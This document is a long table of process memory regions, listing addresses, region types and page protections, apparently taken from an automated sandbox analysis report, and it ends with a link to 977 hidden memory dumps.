heap
|
page read and write
|
||
|
BEF000
|
heap
|
page read and write
|
||
|
27D5823E000
|
heap
|
page read and write
|
||
|
3200000
|
heap
|
page read and write
|
||
|
7E0000
|
heap
|
page read and write
|
||
|
24B90000
|
trusted library allocation
|
page read and write
|
||
|
8B40000
|
trusted library allocation
|
page read and write
|
||
|
8AB164E000
|
stack
|
page read and write
|
||
|
7FF7C11C0000
|
trusted library allocation
|
page read and write
|
||
|
A469EF9000
|
stack
|
page read and write
|
||
|
27D5830A000
|
heap
|
page read and write
|
||
|
2420F970000
|
trusted library allocation
|
page read and write
|
||
|
2420DF75000
|
heap
|
page read and write
|
||
|
27D583AC000
|
heap
|
page read and write
|
||
|
2420DF79000
|
heap
|
page read and write
|
||
|
24420000
|
trusted library allocation
|
page read and write
|
||
|
24430000
|
trusted library allocation
|
page read and write
|
||
|
27D581FD000
|
heap
|
page read and write
|
||
|
27D582BE000
|
heap
|
page read and write
|
||
|
27D58211000
|
heap
|
page read and write
|
||
|
3250000
|
trusted library allocation
|
page read and write
|
||
|
27D581E1000
|
heap
|
page read and write
|
||
|
27D582AB000
|
heap
|
page read and write
|
||
|
21D81000
|
trusted library allocation
|
page read and write
|
||
|
35AF000
|
stack
|
page read and write
|
||
|
24BC0000
|
trusted library allocation
|
page read and write
|
||
|
796F000
|
stack
|
page read and write
|
||
|
27D58402000
|
heap
|
page read and write
|
||
|
736000
|
trusted library allocation
|
page execute and read and write
|
||
|
24420000
|
trusted library allocation
|
page read and write
|
||
|
27D585C3000
|
heap
|
page read and write
|
||
|
700000
|
trusted library allocation
|
page read and write
|
||
|
72CA000
|
stack
|
page read and write
|
||
|
24430000
|
trusted library allocation
|
page read and write
|
||
|
24228318000
|
heap
|
page read and write
|
||
|
23E80000
|
trusted library allocation
|
page read and write
|
||
|
31ED000
|
heap
|
page read and write
|
||
|
27D581D2000
|
heap
|
page read and write
|
||
|
23E80000
|
trusted library allocation
|
page read and write
|
||
|
240DC000
|
stack
|
page read and write
|
||
|
27D58337000
|
heap
|
page read and write
|
||
|
30FE000
|
stack
|
page read and write
|
||
|
3133000
|
heap
|
page read and write
|
||
|
24BD0000
|
trusted library allocation
|
page read and write
|
||
|
24430000
|
trusted library allocation
|
page read and write
|
||
|
BC8000
|
heap
|
page read and write
|
||
|
23E80000
|
trusted library allocation
|
page read and write
|
||
|
27D58A1C000
|
heap
|
page read and write
|
||
|
27D58A11000
|
heap
|
page read and write
|
||
|
24420000
|
trusted library allocation
|
page read and write
|
||
|
2187E000
|
stack
|
page read and write
|
||
|
23EDA000
|
heap
|
page read and write
|
||
|
745000
|
trusted library allocation
|
page execute and read and write
|
||
|
A047000
|
direct allocation
|
page execute and read and write
|
||
|
27D58396000
|
heap
|
page read and write
|
||
|
718D000
|
stack
|
page read and write
|
||
|
21A50000
|
remote allocation
|
page read and write
|
||
|
A469FFE000
|
stack
|
page read and write
|
||
|
27D589F6000
|
heap
|
page read and write
|
||
|
2420DF95000
|
heap
|
page read and write
|
||
|
73A000
|
trusted library allocation
|
page execute and read and write
|
||
|
21DD1000
|
trusted library allocation
|
page read and write
|
||
|
24BD0000
|
trusted library allocation
|
page read and write
|
||
|
23F1D000
|
heap
|
page read and write
|
||
|
3282000
|
trusted library allocation
|
page read and write
|
||
|
24AFF000
|
stack
|
page read and write
|
||
|
23E80000
|
trusted library allocation
|
page read and write
|
||
|
27D582BE000
|
heap
|
page read and write
|
||
|
23F02000
|
heap
|
page read and write
|
||
|
27D582A3000
|
heap
|
page read and write
|
||
|
7FF7C0E70000
|
trusted library allocation
|
page read and write
|
||
|
76A9000
|
heap
|
page read and write
|
||
|
242283FB000
|
heap
|
page read and write
|
||
|
76B6000
|
heap
|
page read and write
|
||
|
7FF7C1080000
|
trusted library allocation
|
page read and write
|
||
|
27D581CA000
|
heap
|
page read and write
|
||
|
29FBDF20000
|
heap
|
page read and write
|
||
|
8638000
|
heap
|
page read and write
|
||
|
27D589E5000
|
heap
|
page read and write
|
||
|
7FF7C1042000
|
trusted library allocation
|
page read and write
|
||
|
2420E160000
|
heap
|
page read and write
|
||
|
27D58222000
|
heap
|
page read and write
|
||
|
27D583BE000
|
heap
|
page read and write
|
||
|
7FF7C1170000
|
trusted library allocation
|
page read and write
|
||
|
23E80000
|
trusted library allocation
|
page read and write
|
||
|
27D58A1C000
|
heap
|
page read and write
|
||
|
23E80000
|
trusted library allocation
|
page read and write
|
||
|
A46A2FE000
|
stack
|
page read and write
|
||
|
24420000
|
trusted library allocation
|
page read and write
|
||
|
864C000
|
heap
|
page read and write
|
||
|
24420000
|
trusted library allocation
|
page read and write
|
||
|
24430000
|
trusted library allocation
|
page read and write
|
||
|
8A5E000
|
stack
|
page read and write
|
||
|
8AB077E000
|
stack
|
page read and write
|
||
|
24BD0000
|
trusted library allocation
|
page read and write
|
||
|
27D589F6000
|
heap
|
page read and write
|
||
|
27D581D5000
|
heap
|
page read and write
|
||
|
4B18000
|
trusted library allocation
|
page read and write
|
||
|
754F000
|
stack
|
page read and write
|
||
|
23DCE000
|
trusted library allocation
|
page read and write
|
||
|
D60000
|
direct allocation
|
page read and write
|
||
|
65C0000
|
heap
|
page read and write
|
||
|
A46A6FE000
|
stack
|
page read and write
|
||
|
27D58256000
|
heap
|
page read and write
|
||
|
24430000
|
trusted library allocation
|
page read and write
|
||
|
27D583CE000
|
heap
|
page read and write
|
||
|
2420FA45000
|
heap
|
page read and write
|
||
|
23E83000
|
trusted library allocation
|
page read and write
|
||
|
24430000
|
trusted library allocation
|
page read and write
|
||
|
23DDE000
|
trusted library allocation
|
page read and write
|
||
|
23DE6000
|
trusted library allocation
|
page read and write
|
||
|
C3A000
|
heap
|
page read and write
|
||
|
27D582A8000
|
heap
|
page read and write
|
||
|
24228310000
|
heap
|
page read and write
|
||
|
7FF7C1190000
|
trusted library allocation
|
page read and write
|
||
|
2183C000
|
stack
|
page read and write
|
||
|
24210479000
|
trusted library allocation
|
page read and write
|
||
|
8AB0978000
|
stack
|
page read and write
|
||
|
7AD0000
|
trusted library allocation
|
page read and write
|
||
|
27D589DB000
|
heap
|
page read and write
|
||
|
27D5839A000
|
heap
|
page read and write
|
||
|
24BD0000
|
trusted library allocation
|
page read and write
|
||
|
24430000
|
trusted library allocation
|
page read and write
|
||
|
714000
|
trusted library allocation
|
page read and write
|
||
|
27D583BE000
|
heap
|
page read and write
|
||
|
3270000
|
trusted library allocation
|
page read and write
|
||
|
24430000
|
trusted library allocation
|
page read and write
|
||
|
27D581CD000
|
heap
|
page read and write
|
||
|
732000
|
trusted library allocation
|
page read and write
|
||
|
27D58236000
|
heap
|
page read and write
|
||
|
23F04000
|
heap
|
page read and write
|
||
|
242286E0000
|
heap
|
page read and write
|
||
|
24B80000
|
trusted library allocation
|
page read and write
|
||
|
2420DF47000
|
heap
|
page read and write
|
||
|
4D6E000
|
stack
|
page read and write
|
||
|
2420E120000
|
heap
|
page read and write
|
||
|
27D582BE000
|
heap
|
page read and write
|
||
|
27D5836C000
|
heap
|
page read and write
|
||
|
24BF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF7C101A000
|
trusted library allocation
|
page read and write
|
||
|
24430000
|
trusted library allocation
|
page read and write
|
||
|
27D589D0000
|
heap
|
page read and write
|
||
|
8C50000
|
direct allocation
|
page read and write
|
||
|
23FA0000
|
heap
|
page read and write
|
||
|
24430000
|
trusted library allocation
|
page read and write
|
||
|
24430000
|
trusted library allocation
|
page read and write
|
||
|
6017000
|
remote allocation
|
page execute and read and write
|
||
|
27D581DD000
|
heap
|
page read and write
|
||
|
8C10000
|
direct allocation
|
page read and write
|
||
|
C44000
|
heap
|
page read and write
|
||
|
2435D000
|
stack
|
page read and write
|
||
|
27D5838C000
|
heap
|
page read and write
|
||
|
24430000
|
trusted library allocation
|
page read and write
|
||
|
27D58280000
|
heap
|
page read and write
|
||
|
27D585D1000
|
heap
|
page read and write
|
||
|
8B90000
|
direct allocation
|
page read and write
|
||
|
23F07000
|
heap
|
page read and write
|
||
|
8AB07FE000
|
stack
|
page read and write
|
||
|
27D58396000
|
heap
|
page read and write
|
||
|
23E80000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0E63000
|
trusted library allocation
|
page execute and read and write
|
||
|
7B3B000
|
stack
|
page read and write
|
||
|
24420000
|
trusted library allocation
|
page read and write
|
||
|
23E67000
|
trusted library allocation
|
page read and write
|
||
|
710000
|
trusted library allocation
|
page read and write
|
||
|
27D5839A000
|
heap
|
page read and write
|
||
|
24B80000
|
trusted library allocation
|
page read and write
|
||
|
21A50000
|
remote allocation
|
page read and write
|
||
|
24228108000
|
heap
|
page read and write
|
||
|
B447000
|
direct allocation
|
page execute and read and write
|
||
|
8AB0B7E000
|
stack
|
page read and write
|
||
|
23DE1000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0F10000
|
trusted library allocation
|
page read and write
|
||
|
8C20000
|
direct allocation
|
page read and write
|
||
|
8BF0000
|
direct allocation
|
page read and write
|
||
|
24211A1C000
|
trusted library allocation
|
page read and write
|
||
|
319F000
|
heap
|
page read and write
|
||
|
7FF7C1050000
|
trusted library allocation
|
page execute and read and write
|
||
|
27D582F5000
|
heap
|
page read and write
|
||
|
720000
|
trusted library allocation
|
page read and write
|
||
|
27D582A0000
|
heap
|
page read and write
|
||
|
24430000
|
trusted library allocation
|
page read and write
|
||
|
27D589DD000
|
heap
|
page read and write
|
||
|
27D583D2000
|
heap
|
page read and write
|
||
|
3220000
|
trusted library section
|
page read and write
|
||
|
27D58A1D000
|
heap
|
page read and write
|
||
|
24BE0000
|
trusted library allocation
|
page read and write
|
||
|
27D58232000
|
heap
|
page read and write
|
||
|
23EA0000
|
heap
|
page read and write
|
||
|
243DE000
|
stack
|
page read and write
|
||
|
4DAF000
|
stack
|
page read and write
|
||
|
27D58370000
|
heap
|
page read and write
|
||
|
27D563E0000
|
heap
|
page read and write
|
||
|
A46A9FB000
|
stack
|
page read and write
|
||
|
8620000
|
heap
|
page read and write
|
||
|
29FBE2C0000
|
heap
|
page read and write
|
||
|
242283C6000
|
heap
|
page read and write
|
||
|
24430000
|
trusted library allocation
|
page read and write
|
||
|
655E000
|
stack
|
page read and write
|
||
|
21DCD000
|
trusted library allocation
|
page read and write
|
||
|
4CEE000
|
stack
|
page read and write
|
||
|
218BE000
|
stack
|
page read and write
|
||
|
7FF7C1070000
|
trusted library allocation
|
page read and write
|
||
|
23E80000
|
trusted library allocation
|
page read and write
|
||
|
24440000
|
trusted library allocation
|
page read and write
|
||
|
79AE000
|
stack
|
page read and write
|
||
|
A46A3FE000
|
stack
|
page read and write
|
||
|
21AE0000
|
direct allocation
|
page read and write
|
||
|
27D589E0000
|
heap
|
page read and write
|
||
|
3185000
|
heap
|
page read and write
|
||
|
23E80000
|
trusted library allocation
|
page read and write
|
||
|
27D5630F000
|
heap
|
page read and write
|
||
|
24420000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0F1C000
|
trusted library allocation
|
page execute and read and write
|
||
|
24211A07000
|
trusted library allocation
|
page read and write
|
||
|
740F000
|
heap
|
page read and write
|
||
|
27D589ED000
|
heap
|
page read and write
|
||
|
27D57E50000
|
remote allocation
|
page read and write
|
||
|
27D583AC000
|
heap
|
page read and write
|
||
|
24420000
|
trusted library allocation
|
page read and write
|
||
|
7A60000
|
trusted library allocation
|
page read and write
|
||
|
FFE63ED000
|
stack
|
page read and write
|
||
|
24228230000
|
heap
|
page read and write
|
||
|
23E80000
|
trusted library allocation
|
page read and write
|
||
|
23EB2000
|
heap
|
page read and write
|
||
|
242280F4000
|
heap
|
page read and write
|
||
|
71CB000
|
stack
|
page read and write
|
||
|
27D583E4000
|
heap
|
page read and write
|
||
|
27D5850A000
|
heap
|
page read and write
|
||
|
88B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
24211A42000
|
trusted library allocation
|
page read and write
|
||
|
7AA0000
|
trusted library allocation
|
page read and write
|
||
|
24440000
|
trusted library allocation
|
page read and write
|
||
|
2420DFBF000
|
heap
|
page read and write
|
||
|
7FF7C1130000
|
trusted library allocation
|
page read and write
|
||
|
7A70000
|
trusted library allocation
|
page read and write
|
||
|
24BD0000
|
trusted library allocation
|
page read and write
|
||
|
24430000
|
trusted library allocation
|
page read and write
|
||
|
27D58369000
|
heap
|
page read and write
|
||
|
24430000
|
trusted library allocation
|
page read and write
|
||
|
27D58B0B000
|
heap
|
page read and write
|
||
|
8AB06FF000
|
stack
|
page read and write
|
||
|
24420000
|
trusted library allocation
|
page read and write
|
||
|
24211A5B000
|
trusted library allocation
|
page read and write
|
||
|
24BD0000
|
trusted library allocation
|
page read and write
|
||
|
24430000
|
trusted library allocation
|
page read and write
|
||
|
2441E000
|
stack
|
page read and write
|
||
|
24420000
|
trusted library allocation
|
page read and write
|
||
|
27D581C3000
|
heap
|
page read and write
|
||
|
27D583C0000
|
heap
|
page read and write
|
||
|
27D583F1000
|
heap
|
page read and write
|
||
|
24420000
|
trusted library allocation
|
page read and write
|
||
|
27D582B3000
|
heap
|
page read and write
|
||
|
A46A8FF000
|
stack
|
page read and write
|
||
|
27D58A1C000
|
heap
|
page read and write
|
||
|
23E80000
|
trusted library allocation
|
page read and write
|
||
|
7A50000
|
trusted library allocation
|
page read and write
|
||
|
219AE000
|
stack
|
page read and write
|
||
|
21D60000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0F20000
|
trusted library allocation
|
page execute and read and write
|
||
|
27D58206000
|
heap
|
page read and write
|
||
|
24430000
|
trusted library allocation
|
page read and write
|
||
|
4E1C000
|
trusted library allocation
|
page read and write
|
||
|
27D5847E000
|
heap
|
page read and write
|
||
|
21DBE000
|
trusted library allocation
|
page read and write
|
||
|
27D582BE000
|
heap
|
page read and write
|
||
|
27D58A03000
|
heap
|
page read and write
|
||
|
24210140000
|
trusted library allocation
|
page read and write
|
||
|
24420000
|
trusted library allocation
|
page read and write
|
||
|
8BA0000
|
direct allocation
|
page read and write
|
||
|
D40000
|
heap
|
page read and write
|
||
|
3280000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0F16000
|
trusted library allocation
|
page read and write
|
||
|
29FBDF7B000
|
heap
|
page read and write
|
||
|
29FBE2C5000
|
heap
|
page read and write
|
||
|
7EEA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
21C50000
|
trusted library allocation
|
page read and write
|
||
|
27D5821D000
|
heap
|
page read and write
|
||
|
29FBE140000
|
heap
|
page read and write
|
||
|
89DE000
|
stack
|
page read and write
|
||
|
2FFE000
|
stack
|
page read and write
|
||
|
7860000
|
trusted library allocation
|
page read and write
|
||
|
24420000
|
trusted library allocation
|
page read and write
|
||
|
37A0000
|
heap
|
page read and write
|
||
|
24430000
|
trusted library allocation
|
page read and write
|
||
|
8AA0000
|
trusted library allocation
|
page read and write
|
||
|
24430000
|
trusted library allocation
|
page read and write
|
||
|
4B6C000
|
stack
|
page read and write
|
||
|
889C000
|
stack
|
page read and write
|
||
|
27D583BE000
|
heap
|
page read and write
|
||
|
27D58502000
|
heap
|
page read and write
|
||
|
730E000
|
stack
|
page read and write
|
||
|
24228200000
|
heap
|
page execute and read and write
|
||
|
27D583CC000
|
heap
|
page read and write
|
||
|
27D581D5000
|
heap
|
page read and write
|
||
|
27D5838C000
|
heap
|
page read and write
|
||
|
21AF0000
|
direct allocation
|
page read and write
|
||
|
7FF7C1000000
|
trusted library allocation
|
page read and write
|
||
|
24440000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF7C1011000
|
trusted library allocation
|
page read and write
|
||
|
24BC0000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0E7B000
|
trusted library allocation
|
page read and write
|
||
|
24BE0000
|
trusted library allocation
|
page read and write
|
||
|
24BD0000
|
trusted library allocation
|
page read and write
|
||
|
29FBDF40000
|
heap
|
page read and write
|
||
|
4DB0000
|
heap
|
page execute and read and write
|
||
|
7FF7C1020000
|
trusted library allocation
|
page execute and read and write
|
||
|
2420FC51000
|
trusted library allocation
|
page read and write
|
||
|
8AFE000
|
stack
|
page read and write
|
||
|
27D5850A000
|
heap
|
page read and write
|
||
|
2420FCD6000
|
trusted library allocation
|
page read and write
|
||
|
86B4000
|
heap
|
page read and write
|
||
|
24228210000
|
heap
|
page read and write
|
||
|
2421049C000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C1100000
|
trusted library allocation
|
page read and write
|
||
|
23F02000
|
heap
|
page read and write
|
||
|
27D58396000
|
heap
|
page read and write
|
||
|
27D582D1000
|
heap
|
page read and write
|
||
|
27D581C1000
|
heap
|
page read and write
|
||
|
8AB09F9000
|
stack
|
page read and write
|
||
|
21C50000
|
trusted library allocation
|
page read and write
|
||
|
2420FE78000
|
trusted library allocation
|
page read and write
|
||
|
27D58246000
|
heap
|
page read and write
|
||
|
21ACF000
|
stack
|
page read and write
|
||
|
24430000
|
trusted library allocation
|
page read and write
|
||
|
85B0000
|
heap
|
page read and write
|
||
|
306E000
|
stack
|
page read and write
|
||
|
24D50000
|
trusted library allocation
|
page read and write
|
||
|
24440000
|
trusted library allocation
|
page read and write
|
||
|
8AB174E000
|
stack
|
page read and write
|
||
|
27D563CD000
|
heap
|
page read and write
|
||
|
27D58373000
|
heap
|
page read and write
|
||
|
27D589D5000
|
heap
|
page read and write
|
||
|
24B90000
|
trusted library allocation
|
page read and write
|
||
|
7D0000
|
heap
|
page read and write
|
||
|
23DD2000
|
trusted library allocation
|
page read and write
|
||
|
79F0000
|
trusted library allocation
|
page read and write
|
||
|
D30000
|
direct allocation
|
page read and write
|
||
|
79F8000
|
trusted library allocation
|
page read and write
|
||
|
23F4F000
|
heap
|
page read and write
|
||
|
27D564E0000
|
heap
|
page read and write
|
||
|
BFE000
|
heap
|
page read and write
|
||
|
2421FC60000
|
trusted library allocation
|
page read and write
|
||
|
27D56548000
|
heap
|
page read and write
|
||
|
4DC1000
|
trusted library allocation
|
page read and write
|
||
|
3260000
|
trusted library allocation
|
page read and write
|
||
|
27D5839A000
|
heap
|
page read and write
|
||
|
27D582C1000
|
heap
|
page read and write
|
||
|
27D581E6000
|
heap
|
page read and write
|
||
|
27D583D7000
|
heap
|
page read and write
|
||
|
27D58510000
|
heap
|
page read and write
|
||
|
8AB16CD000
|
stack
|
page read and write
|
||
|
24210102000
|
trusted library allocation
|
page read and write
|
||
|
8AB04FE000
|
stack
|
page read and write
|
||
|
72D000
|
trusted library allocation
|
page execute and read and write
|
||
|
65C7000
|
heap
|
page read and write
|
||
|
23E70000
|
heap
|
page execute and read and write
|
||
|
3253000
|
trusted library allocation
|
page execute and read and write
|
||
|
27D5821A000
|
heap
|
page read and write
|
||
|
27D589E8000
|
heap
|
page read and write
|
||
|
2420FC40000
|
heap
|
page execute and read and write
|
||
|
8AB057E000
|
stack
|
page read and write
|
||
|
8855000
|
trusted library allocation
|
page read and write
|
||
|
327A000
|
trusted library allocation
|
page execute and read and write
|
||
|
7A10000
|
trusted library allocation
|
page read and write
|
||
|
750E000
|
stack
|
page read and write
|
||
|
D80000
|
direct allocation
|
page read and write
|
There are 977 hidden memdumps, click here to show them.